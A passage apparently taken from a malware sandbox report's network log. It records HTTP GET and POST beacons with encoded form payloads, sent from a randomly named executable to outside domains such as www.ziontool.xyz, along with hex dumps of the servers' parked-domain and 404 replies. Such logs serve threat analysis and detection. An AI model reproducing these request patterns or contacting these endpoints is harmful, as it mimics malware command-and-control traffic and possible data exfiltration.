Q7iWry3RapqHnUovZC6m6DWdtqqEgcV/Vt6NCCCnqgk2x1bddjDV79QmXu4e6xPJkFu/81Q95Rxk6lQo8KB0UD2YopY32eUyItvIt5RgYGWPZI5dwDySWaSaxcn5NeYxV69m/GRXMgswFIvs3t9b7y0Kzcghc2bL/6rKsSVztTR0vn0KLpt4OH0wGBeDdfDPyL8BYt0wR8TKmraaBjF/7nVlFxNBo4dIzx/I6FRb6XtP [TRUNCATED]
May 27, 2024 12:21:40.966272116 CEST	309	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.1 Date: Mon, 27 May 2024 10:21:40 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	63185	213.171.195.105	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:42.893456936 CEST	463	OUT	GET /opfh/?R40L6=rBeI5JL4SdE8nFW9pIUfBkvOLwnHMU9O9JCyLdspFwofGsVtAi0tgWeg3zHJ2XnwxoW6lgl8FdELwhlchXf8iZDZl79NZT9hgeyhr+mr8upFSzDJKwHDStxLaliRPfjpA6FezmrpjIYZ&b2PX=hZXl7VFPKl04 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.annahaywardva.co.uk Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
May 27, 2024 12:21:43.676992893 CEST	234	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Mon, 27 May 2024 10:21:43 GMT Content-Type: text/html Content-Length: 2873 Last-Modified: Mon, 31 Jul 2023 14:17:53 GMT Connection: close ETag: "64c7c291-b39" Accept-Ranges: bytes
May 27, 2024 12:21:43.677011013 CEST	1236	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Domain parking page</title> <link rel=
May 27, 2024 12:21:43.677021980 CEST	224	IN	Data Raw: 64 2d 2d 69 73 2d 63 74 61 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 4c 6f 6f 6b 69 6e 67 20 74 6f 20 62 75 79 20 61 20 73 69 6d 69 6c 61 72 20 64 6f 6d 61 69 6e 20 74 6f 20 3c 62 72 3e 0a 20 20 20 Data Ascii: d--is-cta"> <h3> Looking to buy a similar domain to <br> <strong><span class="domainVar"></span>?</strong> </h3> <a class="cta cta--primary" rel="nofollow" id="domainSear
May 27, 2024 12:21:43.677026033 CEST	1236	IN	Data Raw: 63 68 43 74 61 22 3e 53 74 61 72 74 20 73 65 61 72 63 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 72 64 20 63 61 72 64 2d 2d 69 73 2d 63 74 61 20 63 61 72 64 Data Ascii: chCta">Start search</a> </div> <div class="card card--is-cta card--with-side-icon"> <img class="card__side-icon" src="/assets/icon-magic-wand-square-orange.svg" alt=""> <h3><strong>Do more with your domain<
May 27, 2024 12:21:43.677031040 CEST	177	IN	Data Raw: 20 60 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 68 6f 73 74 73 2e 63 6f 2e 75 6b 2f 64 6f 6d 61 69 6e 2d 6e 61 6d 65 73 2f 73 65 61 72 63 68 2f 3f 64 6f 6d 61 69 6e 3d 24 7b 63 6c 65 61 6e 48 6f 73 74 6e 61 6d 65 7d 26 75 74 6d 5f 73 6f 75 Data Ascii: `https://www.fasthosts.co.uk/domain-names/search/?domain=${cleanHostname}&utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking_dac` </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	63186	203.161.43.227	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:48.728432894 CEST	711	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.ziontool.xyz Origin: http://www.ziontool.xyz Referer: http://www.ziontool.xyz/opfh/ Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 56 57 45 41 79 2f 77 33 4a 59 6f 31 7a 72 6c 67 78 77 63 2f 51 5a 7a 4f 39 48 38 69 79 73 4a 35 64 6a 50 79 64 55 6e 59 6f 62 56 70 65 36 72 37 6b 59 30 65 67 6a 71 4b 71 55 57 57 57 67 36 68 6c 54 6a 4d 38 47 63 58 47 79 4a 4b 4d 69 39 6d 30 79 75 4a 42 75 54 50 70 34 50 45 36 45 32 77 66 64 76 77 73 50 57 4a 6c 34 31 6e 44 59 6f 39 5a 46 72 66 53 2f 46 4a 71 62 41 73 58 4d 36 67 72 50 4c 70 45 6d 4a 72 59 41 45 34 56 51 55 6f 38 75 53 67 77 38 43 53 6d 36 31 41 6d 70 6d 31 6a 69 36 37 57 76 71 51 59 62 51 34 6b 68 4a 72 4d 67 6e 4c 7a 75 66 50 59 69 77 62 2b 73 67 54 46 50 34 46 62 4d 33 75 44 2f 41 64 76 53 51 4b 75 67 3d 3d Data Ascii: R40L6=VWEAy/w3JYo1zrlgxwc/QZzO9H8iysJ5djPydUnYobVpe6r7kY0egjqKqUWWWg6hlTjM8GcXGyJKMi9m0yuJBuTPp4PE6E2wfdvwsPWJl41nDYo9ZFrfS/FJqbAsXM6grPLpEmJrYAE4VQUo8uSgw8CSm61Ampm1ji67WvqQYbQ4khJrMgnLzufPYiwb+sgTFP4FbM3uD/AdvSQKug==
May 27, 2024 12:21:49.329905033 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 10:21:49 GMT Server: Apache Content-Length: 38381 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
May 27, 2024 12:21:49.329972982 CEST	1236	IN	Data Raw: 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 Data Ascii: 7.1)" style="fill: #ffe029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.6 299.8) rotate(-27
May 27, 2024 12:21:49.329987049 CEST	1236	IN	Data Raw: 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 37 31 2e 35 22 20 63 79 3d 22 38 31 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 32 30 2e 39 20 33 30 34 2e 38 29 20 72 6f 74 61 74 65 Data Ascii: <circle cx="471.5" cy="817.7" r="3.7" transform="translate(-320.9 304.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="487.9" cy="810.2" r="3.7" transform="translate(-315.6 311.4) rotate(-27.1)" style="fill: #ffe029"/>
May 27, 2024 12:21:49.329998016 CEST	1236	IN	Data Raw: 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 30 31 2e 37 20 33 31 37 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 Data Ascii: 7" transform="translate(-301.7 317.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="504.6" cy="802.3" r="3.7" transform="translate(-310.2 318.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="519.7" cy="812.9" r="3.7
May 27, 2024 12:21:49.330010891 CEST	896	IN	Data Raw: 20 33 34 31 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 37 30 2e 35 22 20 63 79 3d 22 38 30 37 Data Ascii: 341.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="570.5" cy="807.2" r="3.7" transform="translate(-305.2 348.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="572.5" cy="790.5" r="3.7" transform="translate(-297.3
May 27, 2024 12:21:49.330022097 CEST	1236	IN	Data Raw: 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 33 30 2e 36 22 20 63 79 3d 22 37 35 38 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 36 2e 34 20 33 37 30 2e 38 29 20 72 6f 74 61 74 65 Data Ascii: <circle cx="630.6" cy="758.5" r="3.7" transform="translate(-276.4 370.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="647" cy="766.1" r="3.7" transform="translate(-278 379) rotate(-27.1)" style="fill: #ffe029"/> <cir
May 27, 2024 12:21:49.330034018 CEST	1236	IN	Data Raw: 36 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 32 2e 37 20 33 35 34 2e 37 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 Data Ascii: 6" transform="translate(-252.7 354.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="606.7" cy="718.2" r="3.7" transform="translate(-260.6 355.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="615.7" cy="747.7" r="3.7
May 27, 2024 12:21:49.330065966 CEST	448	IN	Data Raw: 20 33 33 39 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 37 31 2e 39 22 20 63 79 3d 22 37 31 34 Data Ascii: 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="571.9" cy="714.5" r="3.7" transform="translate(-262.8 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="587.4" cy="724.6" r="3.7" transform="translate(-265.7
May 27, 2024 12:21:49.330086946 CEST	1236	IN	Data Raw: 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 30 2e 31 20 33 34 35 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 Data Ascii: ="3.7" transform="translate(-250.1 345.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.1" cy="698.1" r="3.7" transform="translate(-255.1 338.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.8" cy="681.2" r=
May 27, 2024 12:21:49.330161095 CEST	1236	IN	Data Raw: 65 28 2d 32 37 32 20 33 32 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 33 37 2e 35 22 20 63 79 3d Data Ascii: e(-272 323) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="537.5" cy="709.2" r="3.7" transform="translate(-264.1 322.9) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="541.1" cy="692.9" r="3.7" transform="translate(-25
May 27, 2024 12:21:49.335212946 CEST	1236	IN	Data Raw: 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 30 39 22 20 63 79 3d 22 37 36 35 2e 39 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 Data Ascii: fill: #ffe029"/> <circle cx="509" cy="765.9" r="3.7" transform="translate(-293.1 316.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="512" cy="748.1" r="3.7" transform="translate(-284.7 315.5) rotate(-27.1)" style="fill:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	63187	203.161.43.227	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:51.270509958 CEST	731	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.ziontool.xyz Origin: http://www.ziontool.xyz Referer: http://www.ziontool.xyz/opfh/ Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 56 57 45 41 79 2f 77 33 4a 59 6f 31 31 50 68 67 79 58 6f 2f 42 35 79 38 68 33 38 69 35 4d 49 79 64 6a 44 79 64 52 48 49 72 74 46 70 5a 62 62 37 71 35 30 65 6e 6a 71 4b 68 30 57 50 4a 77 36 36 6c 54 75 78 38 43 59 58 47 79 31 4b 4d 6a 68 6d 30 42 47 4b 54 4f 54 4e 31 34 50 43 6e 55 32 77 66 64 76 77 73 4f 79 6a 6c 34 74 6e 44 6f 59 39 4c 77 66 63 59 66 46 57 74 62 41 73 46 38 36 6b 72 50 4b 5a 45 6b 73 2b 59 47 41 34 56 56 77 6f 39 38 36 68 35 38 43 63 35 4b 30 43 75 4a 6e 53 6d 78 32 43 55 4a 6a 49 66 71 41 6d 73 33 55 4a 57 43 72 6e 74 2f 6e 30 63 67 55 74 70 4b 39 6d 48 4f 38 64 57 75 44 50 63 49 6c 33 69 41 78 4f 34 62 65 75 78 76 4a 2b 39 51 37 72 55 57 2b 4d 42 65 51 69 67 48 6b 3d Data Ascii: R40L6=VWEAy/w3JYo11PhgyXo/B5y8h38i5MIydjDydRHIrtFpZbb7q50enjqKh0WPJw66lTux8CYXGy1KMjhm0BGKTOTN14PCnU2wfdvwsOyjl4tnDoY9LwfcYfFWtbAsF86krPKZEks+YGA4VVwo986h58Cc5K0CuJnSmx2CUJjIfqAms3UJWCrnt/n0cgUtpK9mHO8dWuDPcIl3iAxO4beuxvJ+9Q7rUW+MBeQigHk=
May 27, 2024 12:21:52.644010067 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 10:21:51 GMT Server: Apache Content-Length: 38381 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
May 27, 2024 12:21:52.644030094 CEST	224	IN	Data Raw: 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 Data Ascii: 7.1)" style="fill: #ffe029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.
May 27, 2024 12:21:52.644041061 CEST	1236	IN	Data Raw: 36 20 32 39 39 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 36 35 2e 32 22 20 63 79 3d 22 38 35 Data Ascii: 6 299.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="465.2" cy="859" r="3.7" transform="translate(-340.4 306.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="483" cy="849.2" r="3.7" transform="translate(-333.9 313
May 27, 2024 12:21:52.644056082 CEST	1236	IN	Data Raw: 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 38 39 2e 38 22 20 63 79 3d 22 37 39 31 2e 31 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 Data Ascii: #ffe029"/> <circle cx="489.8" cy="791.1" r="3.7" transform="translate(-306.7 310.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="473.1" cy="798.2" r="3.7" transform="translate(-311.8 303.4) rotate(-27.1)" style="fill:
May 27, 2024 12:21:52.644067049 CEST	1236	IN	Data Raw: 22 20 63 79 3d 22 38 31 32 2e 39 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 31 33 2e 34 20 33 32 36 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c Data Ascii: " cy="812.9" r="3.7" transform="translate(-313.4 326.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="534.7" cy="822.9" r="3.7" transform="translate(-316.3 334.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="536.8"
May 27, 2024 12:21:52.644084930 CEST	672	IN	Data Raw: 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 39 37 2e 33 20 33 34 37 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 Data Ascii: ="translate(-297.3 347.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="589.7" cy="797.2" r="3.7" transform="translate(-298.5 356.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="590" cy="782.3" r="3.7" transform="t
May 27, 2024 12:21:52.644136906 CEST	1236	IN	Data Raw: 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 33 30 2e 36 22 20 63 79 3d 22 37 35 38 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 36 2e 34 20 33 37 30 2e 38 29 20 72 6f 74 61 74 65 Data Ascii: <circle cx="630.6" cy="758.5" r="3.7" transform="translate(-276.4 370.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="647" cy="766.1" r="3.7" transform="translate(-278 379) rotate(-27.1)" style="fill: #ffe029"/> <cir
May 27, 2024 12:21:52.644155025 CEST	1236	IN	Data Raw: 36 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 32 2e 37 20 33 35 34 2e 37 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 Data Ascii: 6" transform="translate(-252.7 354.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="606.7" cy="718.2" r="3.7" transform="translate(-260.6 355.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="615.7" cy="747.7" r="3.7
May 27, 2024 12:21:52.644167900 CEST	1236	IN	Data Raw: 20 33 33 39 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 37 31 2e 39 22 20 63 79 3d 22 37 31 34 Data Ascii: 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="571.9" cy="714.5" r="3.7" transform="translate(-262.8 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="587.4" cy="724.6" r="3.7" transform="translate(-265.7
May 27, 2024 12:21:52.644217014 CEST	1236	IN	Data Raw: 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 32 36 2e 33 22 20 63 79 3d 22 36 38 32 2e 34 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 Data Ascii: ="fill: #ffe029"/> <circle cx="526.3" cy="682.4" r="3.7" transform="translate(-253.2 314.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="522.2" cy="697.3" r="3.7" transform="translate(-260.4 314.6) rotate(-27.1)" style=
May 27, 2024 12:21:52.644227982 CEST	1236	IN	Data Raw: 69 72 63 6c 65 20 63 78 3d 22 35 33 30 22 20 63 79 3d 22 37 34 32 2e 32 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 38 30 20 33 32 33 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 Data Ascii: ircle cx="530" cy="742.2" r="3.7" transform="translate(-280 323.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="526.7" cy="759.5" r="3.7" transform="translate(-288.3 323.5) rotate(-27.1)" style="fill: #ffe029"/> <circle
